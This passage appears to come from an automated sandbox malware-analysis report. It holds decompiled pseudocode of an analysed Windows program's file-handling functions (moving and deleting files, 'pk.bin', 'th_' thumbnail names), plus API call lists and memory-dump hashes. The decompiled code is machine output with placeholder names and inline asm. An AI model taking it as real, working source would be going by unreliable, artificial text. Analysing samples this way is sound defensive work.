    • #540.MFC42(?,?), ref: 00424105
    • #2818.MFC42(?,?,?,?,?), ref: 00424149
    • #800.MFC42 ref: 00424158
    • #924.MFC42(?,004558C8,pk.bin), ref: 004241AC
    • #800.MFC42(?,004558C8,pk.bin), ref: 004241C5
    • DeleteFileA.KERNEL32(?), ref: 004241F4
    • DeleteFileA.KERNEL32(?), ref: 00424217
    • #537.MFC42(?), ref: 00424225
    • #5683.MFC42(0000005C,?), ref: 00424233
    • #4129.MFC42(?,00000001,0000005C,?), ref: 00424241
    • #941.MFC42(th_,?,00000001,0000005C,?), ref: 00424252
    • #5683.MFC42(0000005C,th_,?,00000001,0000005C,?), ref: 0042425C
    • #4277.MFC42(?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042426A
    • #939.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424277
    • #800.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424283
    • #5683.MFC42(0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042428D
    • #4129.MFC42(?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042429A
    • #858.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242A7
    • #800.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242B3
    • DeleteFileA.KERNEL32(?,00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242BB
    • #800.MFC42 ref: 004242C4
    • #800.MFC42 ref: 004242D0
    • #537.MFC42(?), ref: 00424300
    • #5683.MFC42(0000002E,?), ref: 0042430E
    • #4129.MFC42(?,00000000,0000002E,?), ref: 0042431B
    • #858.MFC42(00000000,?,00000000,0000002E,?), ref: 00424328
    • #800.MFC42(00000000,?,00000000,0000002E,?), ref: 00424334
    • MoveFileA.KERNEL32 ref: 00424346
    • #800.MFC42 ref: 00424353
    • DeleteFileA.KERNEL32(?), ref: 0042436E
    • DeleteFileA.KERNEL32(?), ref: 00424373
    • DeleteFileA.KERNEL32(?), ref: 00424378
    • DeleteFileA.KERNEL32(?), ref: 00424385
    • #800.MFC42 ref: 00424394
    • #800.MFC42 ref: 004243AC
    • #800.MFC42 ref: 004243E8
    • #800.MFC42 ref: 004243F4
    • #800.MFC42 ref: 00424400
    • #800.MFC42 ref: 0042440C
    • #800.MFC42 ref: 00424417
    • #800.MFC42 ref: 00424423
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$File$Delete$#5683$#4129#537#858$#4277$#2818#3790#540#924#939#941Move
    • String ID: !$pk.bin$th_
    • API String ID: 1982520284-890230901
    • Opcode ID: b23c7ce43ee635d1412bbe1d5acf9bc8deccf275408fc8fdf1b6bf42c8cac3f3
    • Instruction ID: 48a4b5b5f3631110273161b13b6e66cca7681c4f7b3feb1bbde68e5369fc9437
    • Opcode Fuzzy Hash: b23c7ce43ee635d1412bbe1d5acf9bc8deccf275408fc8fdf1b6bf42c8cac3f3
    • Instruction Fuzzy Hash: 26D1C431C0128DEECF15EFE5D895AEEBBB4AF19304F00449EE50667282DB785B48CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00429FDA(void* __ecx, void* __eflags) {
    				void* _t160;
    				void* _t163;
    				short _t168;
    				void* _t186;
    				void* _t198;
    				void* _t201;
    				CHAR* _t202;
    				void* _t203;
    				void* _t208;
    				intOrPtr* _t215;
    				intOrPtr _t216;
    				CHAR** _t217;
    				void* _t220;
    				CHAR** _t291;
    				void* _t292;
    				void* _t294;
    				intOrPtr _t297;
    
    				E0043E4E0(0x443180, _t292);
    				E0043E690(0x20b0, __ecx);
    				L0043E486();
    				 *(_t292 - 4) = 0;
    				L0043DDDE();
    				 *(_t292 - 4) = 1;
    				L0043DDD8();
    				 *(_t292 - 0x3c) =  *(_t292 - 0x3c) | 0xffffffff;
    				_push(0);
    				 *(_t292 - 4) = 2;
    				 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
    				 *((intOrPtr*)(_t292 - 0x40)) = 0;
    				L0043DDD2();
    				 *((intOrPtr*)(_t292 - 0x34)) = 0x449630;
    				 *((intOrPtr*)(_t292 - 0x30)) = 0;
    				 *((intOrPtr*)(_t292 - 0x24)) = 0;
    				 *((intOrPtr*)(_t292 - 0x28)) = 0;
    				 *((intOrPtr*)(_t292 - 0x2c)) = 0;
    				_t160 = _t292 - 0x48;
    				_push(_t160);
    				_push(0);
    				_push( *((intOrPtr*)(_t292 + 8)));
    				 *(_t292 - 4) = 4;
    				L0043E480();
    				if(_t160 == 0) {
    					L33:
    					 *(_t292 - 4) = 3;
    					E0042ACEC(_t292 - 0x34);
    					 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
    					 *(_t292 - 4) = 5;
    					L34:
    					L0043DD36();
    					 *(_t292 - 4) =  *(_t292 - 4) | 0xffffffff;
    					 *((intOrPtr*)(_t292 - 0x48)) = 0x44547c;
    					L0043E46E();
    					 *[fs:0x0] =  *((intOrPtr*)(_t292 - 0xc));
    					return 0;
    				}
    				L0043E2A6();
    				if(_t160 == 0) {
    					goto L33;
    				}
    				L0043DDD8();
    				_t163 = _t292 - 0x14;
    				_push(_t163);
    				 *(_t292 - 4) = 6;
    				L0043E4B6();
    				if(_t163 == 0) {
    					L16:
    					L0043E474();
    					memset(_t292 - 0x88, 0, 0x10);
    					memset(_t292 - 0xa8, 0, 0x10);
    					 *(_t292 - 0x88) = 0x7bc;
    					 *(_t292 - 0xa8) = 0x7e4;
    					_t168 = 1;
    					 *((short*)(_t292 - 0xa6)) = _t168;
    					 *((short*)(_t292 - 0xa2)) = _t168;
    					 *((short*)(_t292 - 0x86)) = _t168;
    					 *((short*)(_t292 - 0x82)) = _t168;
    					L0043DDD8();
    					 *(_t292 - 4) = 8;
    					L0043DDD8();
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					 *(_t292 - 4) = 9;
    					asm("movsd");
    					memset(_t292 - 0xb8, 0, 0x10);
    					_t297 = _t294 + 0x24;
    					 *((short*)(_t292 - 0x90)) = 0x17;
    					 *((short*)(_t292 - 0x8e)) = 0x3b;
    					 *((short*)(_t292 - 0x8c)) = 0x3b;
    					 *((intOrPtr*)(_t292 + 8)) = 0;
    					if( *((intOrPtr*)(_t292 - 0x2c)) - 1 < 0) {
    						L30:
    						 *(_t292 - 4) = 8;
    						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0xc)))) - 8)) != 0) {
    							L0043DD36();
    							 *(_t292 - 4) = 6;
    							L0043DD36();
    							 *(_t292 - 4) = 4;
    							L0043DD36();
    							 *(_t292 - 4) = 3;
    							E0042ACEC(_t292 - 0x34);
    							 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
    							_push(1);
    							 *(_t292 - 4) = 0xe;
    							_pop(0);
    						} else {
    							L0043DD36();
    							 *(_t292 - 4) = 6;
    							L0043DD36();
    							 *(_t292 - 4) = 4;
    							L0043DD36();
    							 *(_t292 - 4) = 3;
    							E0042ACEC(_t292 - 0x34);
    							 *((intOrPtr*)(_t292 - 0x48)) = 0x445490;
    							 *(_t292 - 4) = 0xd;
    						}
    						goto L34;
    					}
    					 *((intOrPtr*)(_t292 - 0x18)) = 0;
    					do {
    						_push(_t292 - 0x78);
    						L0043E4A4();
    						L0043DE32();
    						_push(_t292 - 0x10);
    						 *((intOrPtr*)(_t292 - 0x54)) = _t297;
    						_push(0xffffffff);
    						L0043E4BC();
    						_t256 = E0042ACDC(_t292 - 0x34,  *((intOrPtr*)(_t292 + 8)));
    						if(E0042A478(_t256, _t292 - 0x88) != 0) {
    							_push(_t256);
    							 *((intOrPtr*)(_t292 - 0x54)) = _t297;
    							_push(0xffffffff);
    							L0043E4BC();
    							_t256 = E0042ACDC(_t292 - 0x34,  *((intOrPtr*)(_t292 + 8)));
    							_t198 = E004249CF(_t197, _t292 - 0x98);
    							_t311 = _t198;
    							if(_t198 != 0) {
    								_push( *((intOrPtr*)(_t292 + 8)));
    								_push(_t292 - 0x34);
    								_push(_t292 - 0x20);
    								_t201 = E00429920(_t311);
    								_t297 = _t297 + 0xc;
    								_push(_t201);
    								 *(_t292 - 4) = 0xa;
    								L0043DFCA();
    								_t256 = _t292 - 0x20;
    								 *(_t292 - 4) = 9;
    								L0043DD36();
    							}
    						}
    						if( *((intOrPtr*)( *((intOrPtr*)(_t292 - 0x10)) - 8)) == 0) {
    							L0043DE32();
    						} else {
    							_push( *((intOrPtr*)(E00429098(_t256, _t292 - 0x4c, _t292 - 0x78))));
    							 *(_t292 - 4) = 0xb;
    							_push("<H1>&nbsp;%s</H1>");
    							_push(_t292 - 0x1c);
    							L0043E174();
    							_t297 = _t297 + 0xc;
    							 *(_t292 - 4) = 9;
    							L0043DD36();
    						}
    						if( *((intOrPtr*)(_t292 - 0xb2)) !=  *((intOrPtr*)(_t292 - 0x72)) ||  *((intOrPtr*)(_t292 - 0xb6)) !=  *((intOrPtr*)(_t292 - 0x76)) ||  *(_t292 - 0xb8) !=  *((intOrPtr*)(_t292 - 0x78))) {
    							_push(_t292 - 0x10);
    							_push(_t292 - 0x1c);
    							_t186 = _t292 - 0x50;
    							_push(_t186);
    							L0043E282();
    							_push(_t186);
    							 *(_t292 - 4) = 0xc;
    							L0043DE1A();
    							 *(_t292 - 4) = 9;
    							L0043DD36();
    						} else {
    							_push(_t292 - 0x10);
    							L0043DE1A();
    						}
    						asm("movsd");
    						 *((intOrPtr*)(_t292 + 8)) =  *((intOrPtr*)(_t292 + 8)) + 1;
    						 *((intOrPtr*)(_t292 - 0x18)) =  *((intOrPtr*)(_t292 - 0x18)) + 0x1004;
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    					} while ( *((intOrPtr*)(_t292 + 8)) <=  *((intOrPtr*)(_t292 - 0x2c)) - 1);
    					goto L30;
    				} else {
    					do {
    						_t202 =  *(_t292 - 0x14);
    						if( *((intOrPtr*)(_t202 - 8)) == 0) {
    							goto L15;
    						}
    						lstrcpynA(_t292 - 0x20bc, _t202, 0xfff);
    						E00429085(_t292 - 0x20bc);
    						_t208 = _t292 - 0x14;
    						_push(_t208);
    						L0043E4B6();
    						if(_t208 == 0) {
    							goto L16;
    						}
    						lstrcpynA(_t292 - 0x8b8,  *(_t292 - 0x14), 0x7ff);
    						E00429085(_t292 - 0x8b8);
    						_push(_t292 - 0x8b8);
    						_t215 =  *((intOrPtr*)(E00409643(_t292 + 8)));
    						 *(_t292 - 4) = 7;
    						if(_t215 == 0) {
    							_t216 = 0;
    							__eflags = 0;
    						} else {
    							_t216 =  *_t215;
    						}
    						_t217 = E00429215(_t292 - 0x18, _t216, _t292 - 0x18);
    						_t291 = _t217;
    						 *(_t292 - 4) = 6;
    						_t275 =  *((intOrPtr*)(_t292 + 8));
    						if( *((intOrPtr*)(_t292 + 8)) != 0) {
    							_t217 = E004096DD(_t275);
    							 *((intOrPtr*)(_t292 + 8)) = 0;
    						}
    						if(_t291 != 0) {
    							L0043E144();
    							lstrcpyA(_t292 - 0x8b8,  *_t217);
    							L0043DD36();
    							__imp__#6( *((intOrPtr*)(_t292 - 0x18)),  *((intOrPtr*)(_t292 - 0x18)));
    						}
    						_t220 = E0042987E(_t292 - 0x20bc, _t292 - 0x10bc);
    						_t307 = _t220;
    						if(_t220 != 0) {
    							E0042ACAF(_t292 - 0x34, _t307, _t292 - 0x10bc);
    						}
    						L15:
    						_t203 = _t292 - 0x14;
    						_push(_t203);
    						L0043E4B6();
    					} while (_t203 != 0);
    					goto L16;
    				}
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00429FDF
    • #533.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 00429FF4
    • #350.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 0042A001
    • #540.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 0042A00D
    • #860.MFC42(00000000,?,00000001,00000000,0042A4E3), ref: 0042A029
    • #5194.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A050
    • #3318.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A060
    • #540.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A070
    • #5465.MFC42(?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A080
    • lstrcpynA.KERNEL32(?,?,00000FFF,?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A0AC
    • #5465.MFC42(?,?,00000001,00000000,0042A4E3), ref: 0042A0C2
    • lstrcpynA.KERNEL32(?,?,000007FF,?,?,00000001,00000000,0042A4E3), ref: 0042A0DE
      • Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
      • Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653
    • #539.MFC42(?,?,?,00000001,00000000,0042A4E3), ref: 0042A137
    • lstrcpyA.KERNEL32(?,00000000,?,?,?,00000001,00000000,0042A4E3), ref: 0042A145
    • #800.MFC42(?,00000001,00000000,0042A4E3), ref: 0042A14E
    • SysFreeString.OLEAUT32(?), ref: 0042A156
    • #5465.MFC42(?,?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A18B
    • #1997.MFC42(?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A19B
    • memset.MSVCRT ref: 0042A1AA
    • memset.MSVCRT ref: 0042A1B9
    • #540.MFC42 ref: 0042A1F5
    • #540.MFC42 ref: 0042A201
    • memset.MSVCRT ref: 0042A224
    • #6673.MFC42(?), ref: 0042A265
    • #2614.MFC42(?), ref: 0042A26D
    • #548.MFC42(?,000000FF,?,?), ref: 0042A281
    • #548.MFC42(?,000000FF,?,?,?,000000FF,?,?), ref: 0042A2AB
    • #858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A2E1
    • #800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A2ED
    • #2818.MFC42(?,<H1>&nbsp;%s</H1>,00000000,?,?,000000FF,?,?), ref: 0042A318
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A327
    • #2614.MFC42(?,?,000000FF,?,?), ref: 0042A331
    • #939.MFC42(00000001,?,?,000000FF,?,?), ref: 0042A364
    • #922.MFC42(00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A377
    • #939.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A384
    • #800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A390
    • #800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3CA
    • #800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3D6
    • #800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3E2
    • #800.MFC42 ref: 0042A400
    • #800.MFC42 ref: 0042A40C
    • #800.MFC42 ref: 0042A418
    • #800.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A44F
    • #798.MFC42(?,00000000,00000001,00000000), ref: 0042A462
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#540$#5465memset$#2614#548#939H_prologlstrcpyn$#1997#2818#3318#350#5194#533#539#6673#798#823#858#860#922FreeStringlstrcpy
    • String ID: ;$;$<H1>&nbsp;%s</H1>$|TD
    • API String ID: 1136394844-2946028977
    • Opcode ID: 6b138614185374d8f5a59568fe9b2a81f14a8e52516fe617daeb1eba522b116f
    • Instruction ID: 647c27339a496d4ec5a2929266941c097d32bc3c000974a514577c5eb7e8b247
    • Opcode Fuzzy Hash: 6b138614185374d8f5a59568fe9b2a81f14a8e52516fe617daeb1eba522b116f
    • Instruction Fuzzy Hash: 4EE17371D0025DDBDF11EFE5D885AEEB7B8AF18308F50405EE405A7282DB785B49CB2A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00424065(CHAR* __ebx, void* __edx, void* __esi) {
    				char _t150;
    				intOrPtr* _t159;
    				void* _t163;
    				intOrPtr _t169;
    				void* _t170;
    				void* _t175;
    				void* _t178;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				void* _t191;
    				void* _t199;
    				CHAR* _t201;
    				signed int _t203;
    				void* _t237;
    				void* _t265;
    				void* _t266;
    				void* _t268;
    
    				_t265 = __esi;
    				_t260 = __edx;
    				_t201 = __ebx;
    				 *(_t268 + 8) =  &(( *(_t268 + 8))[ *((intOrPtr*)(_t268 - 0x54))]);
    				if( *((intOrPtr*)(__esi + 0x14e)) != __ebx) {
    					E00418858(__edx,  *((intOrPtr*)(_t268 - 0x18)));
    					_push(_t268 - 0x38);
    					L004112B7(_t268 - 0x38, __ebx, _t268 - 0xe0, __edx, __esi);
    					_push(_t268 - 0xe0);
    					L00412218(_t268 - 0xe0, __ebx, _t268 - 0x1cc, __edx, __esi);
    					_t199 = _t268 - 0x34c;
    					_push(_t199);
    					_push( *(_t268 - 0x38));
    					L0043E294();
    					if(_t199 != 0) {
    						 *(_t268 + 8) =  &(( *(_t268 + 8))[ *((intOrPtr*)(_t268 - 0x340))]);
    					}
    					if( *(_t268 - 0x14) == _t201) {
    						 *(_t268 + 8) = _t201;
    					}
    				}
    				if( *((intOrPtr*)(_t265 + 0x134)) != _t201 &&  *(_t268 + 8) >> 0xa <  *((intOrPtr*)(_t265 + 0x10c))) {
    					 *(_t268 + 8) = _t201;
    				}
    				_t150 =  *0x4550cc; // 0x0
    				 *((char*)(_t268 - 0x4cc)) = _t150;
    				_t203 = 0x1f;
    				memset(_t268 - 0x4cb, 0, _t203 << 2);
    				asm("stosw");
    				asm("stosb");
    				E0042A943(_t268 - 0x4cc);
    				L0043DDD8();
    				 *(_t268 - 4) = 0x21;
    				asm("sbb eax, eax");
    				_t159 = E00429029(_t268 - 0x1c,  ~( *(_t265 + 0x135)) + 0xe016);
    				_push(_t268 - 0x44c);
    				_push(_t268 - 0x4cc);
    				_push(_t268 - 0x3cc);
    				_push( *_t159);
    				 *(_t268 - 4) = 0x22;
    				_push(_t268 - 0x4c);
    				L0043E174();
    				 *(_t268 - 4) = 0x21;
    				L0043DD36();
    				_push(_t268 - 0x4c);
    				L004128F9(_t268 - 0x4c, _t201, _t268 - 0x1cc, _t260, _t265);
    				if( *(_t268 + 8) == _t201) {
    					L15:
    					if( *((intOrPtr*)(_t265 + 0x132)) != _t201) {
    						 *(_t268 - 0x10) = _t201;
    						if( *((intOrPtr*)(_t268 - 0x60)) >= _t201) {
    							do {
    								_t169 =  *((intOrPtr*)(_t268 - 0x64));
    								_push( *((intOrPtr*)(_t169 +  *(_t268 - 0x10) * 4)));
    								L0043DE26();
    								_push(0x2e);
    								 *(_t268 - 4) = 0x28;
    								L0043DFB8();
    								_push(_t169);
    								_t170 = _t268 - 0x1c;
    								_push(_t170);
    								L0043DFD0();
    								_push(_t170);
    								 *(_t268 - 4) = 0x29;
    								L0043DFCA();
    								 *(_t268 - 4) = 0x28;
    								L0043DD36();
    								MoveFileA( *( *((intOrPtr*)(_t268 - 0x64)) +  *(_t268 - 0x10) * 4),  *(_t268 + 8));
    								 *(_t268 - 4) = 0x21;
    								L0043DD36();
    								 *(_t268 - 0x10) =  *(_t268 - 0x10) + 1;
    							} while ( *(_t268 - 0x10) <=  *((intOrPtr*)(_t268 - 0x60)));
    						}
    					}
    				} else {
    					_t175 = _t268 - 0x1cc;
    					_push(_t175);
    					L00412FF7(_t175, _t201, _t268 - 0xfc, _t260, _t265);
    					_t282 = _t175;
    					if(_t175 == 0) {
    						goto L15;
    					} else {
    						_push("pk.bin");
    						 *((intOrPtr*)(_t265 + 0x118)) =  *((intOrPtr*)(_t268 - 0x6c));
    						_push(0x4558c8);
    						_push(_t268 + 8);
    						L0043DE20();
    						 *(_t268 - 4) = 0x23;
    						_t178 = E0040BC5C(_t265, _t282,  *(_t268 + 8));
    						_t237 = _t268 + 8;
    						 *(_t268 - 4) = 0x21;
    						L0043DD36();
    						if( *((intOrPtr*)(_t265 + 0x110)) == _t201) {
    							goto L15;
    						} else {
    							E004254F6(L004044C9(E004207A5(L004044C9(_t178, _t237, _t265) + 0x78), L004044C9(_t178, _t237, _t265) + 0x78, _t265));
    							DeleteFileA( *(_t268 - 0x24));
    							if( *((intOrPtr*)(_t265 + 0x132)) != _t201) {
    								 *(_t268 - 0x14) = _t201;
    								if( *((intOrPtr*)(_t268 - 0x60)) >= _t201) {
    									do {
    										DeleteFileA( *( *((intOrPtr*)(_t268 - 0x64)) +  *(_t268 - 0x14) * 4));
    										_t186 =  *((intOrPtr*)(_t268 - 0x64));
    										_push( *((intOrPtr*)(_t186 +  *(_t268 - 0x14) * 4)));
    										L0043DE26();
    										_push(0x5c);
    										 *(_t268 - 4) = 0x24;
    										L0043DFB8();
    										_push(_t186 + 1);
    										_t188 = _t268 + 8;
    										_push(_t188);
    										L0043DFD0();
    										_push("th_");
    										 *(_t268 - 4) = 0x25;
    										L0043E0CC();
    										_push(0x5c);
    										L0043DFB8();
    										_push(_t188 + 1);
    										_t190 = _t268 - 0x1c;
    										_push(_t190);
    										L0043DFB2();
    										_push(_t190);
    										 *(_t268 - 4) = 0x26;
    										L0043DE1A();
    										 *(_t268 - 4) = 0x25;
    										L0043DD36();
    										_push(0x2e);
    										L0043DFB8();
    										_push(_t190);
    										_t191 = _t268 - 0x40;
    										_push(_t191);
    										L0043DFD0();
    										_push(_t191);
    										 *(_t268 - 4) = 0x27;
    										L0043DFCA();
    										 *(_t268 - 4) = 0x25;
    										L0043DD36();
    										DeleteFileA( *(_t268 + 8));
    										 *(_t268 - 4) = 0x24;
    										L0043DD36();
    										 *(_t268 - 4) = 0x21;
    										L0043DD36();
    										 *(_t268 - 0x14) =  *(_t268 - 0x14) + 1;
    									} while ( *(_t268 - 0x14) <=  *((intOrPtr*)(_t268 - 0x60)));
    								}
    								goto L15;
    							}
    						}
    					}
    				}
    				if( *(_t265 + 0x135) != _t201) {
    					DeleteFileA( *(_t268 - 0x2c));
    					DeleteFileA( *(_t268 - 0x34));
    					DeleteFileA( *(_t268 - 0x3c));
    				}
    				if( *((intOrPtr*)(_t265 + 0x14e)) != _t201) {
    					DeleteFileA( *(_t268 - 0x38));
    				}
    				 *0x455900 = _t201;
    				 *(_t268 - 4) = 0x1e;
    				L0043DD36();
    				 *(_t268 - 4) = 0x1c;
    				_t163 = E0042839B(_t268 - 0x68);
    				 *(_t268 - 4) = 0x1b;
    				L0043DD36();
    				 *(_t268 - 4) = 7;
    				L004110CC(_t163, _t201, _t268 - 0xe0, _t260, _t265);
    				 *(_t268 - 4) = 6;
    				L00411F64(_t163, _t201, _t268 - 0x1cc, _t260, _t265);
    				_t266 = 1;
    				 *(_t268 - 4) = 5;
    				L00412C30(_t163, _t201, _t268 - 0xfc, _t260, _t266);
    				 *(_t268 - 4) = 4;
    				L0043DD36();
    				 *(_t268 - 4) = 3;
    				L0043DD36();
    				 *(_t268 - 4) = 2;
    				L0043DD36();
    				 *(_t268 - 4) = 1;
    				L0043DD36();
    				 *(_t268 - 4) = _t201;
    				L0043DD36();
    				 *(_t268 - 4) =  *(_t268 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
    				return _t266;
    			}

    APIs
    • #3790.MFC42(?,?), ref: 004240A7
    • #540.MFC42(?,?), ref: 00424105
    • #2818.MFC42(?,?,?,?,?), ref: 00424149
    • #800.MFC42 ref: 00424158
    • #924.MFC42(?,004558C8,pk.bin), ref: 004241AC
    • #800.MFC42(?,004558C8,pk.bin), ref: 004241C5
    • DeleteFileA.KERNEL32(?), ref: 004241F4
    • DeleteFileA.KERNEL32(?), ref: 00424217
    • #537.MFC42(?), ref: 00424225
    • #5683.MFC42(0000005C,?), ref: 00424233
    • #4129.MFC42(?,00000001,0000005C,?), ref: 00424241
    • #941.MFC42(th_,?,00000001,0000005C,?), ref: 00424252
    • #5683.MFC42(0000005C,th_,?,00000001,0000005C,?), ref: 0042425C
    • #4277.MFC42(?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042426A
    • #939.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424277
    • #800.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424283
    • #5683.MFC42(0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042428D
    • #4129.MFC42(?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042429A
    • #858.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242A7
    • #800.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242B3
    • DeleteFileA.KERNEL32(?,00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242BB
    • #800.MFC42 ref: 004242C4
    • #800.MFC42 ref: 004242D0
    • #537.MFC42(?), ref: 00424300
    • #5683.MFC42(0000002E,?), ref: 0042430E
    • #4129.MFC42(?,00000000,0000002E,?), ref: 0042431B
    • #858.MFC42(00000000,?,00000000,0000002E,?), ref: 00424328
    • #800.MFC42(00000000,?,00000000,0000002E,?), ref: 00424334
    • MoveFileA.KERNEL32 ref: 00424346
    • #800.MFC42 ref: 00424353
    • DeleteFileA.KERNEL32(?), ref: 0042436E
    • DeleteFileA.KERNEL32(?), ref: 00424373
    • DeleteFileA.KERNEL32(?), ref: 00424378
    • DeleteFileA.KERNEL32(?), ref: 00424385
    • #800.MFC42 ref: 00424394
    • #800.MFC42 ref: 004243AC
    • #800.MFC42 ref: 004243E8
    • #800.MFC42 ref: 004243F4
    • #800.MFC42 ref: 00424400
    • #800.MFC42 ref: 0042440C
    • #800.MFC42 ref: 00424417
    • #800.MFC42 ref: 00424423
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
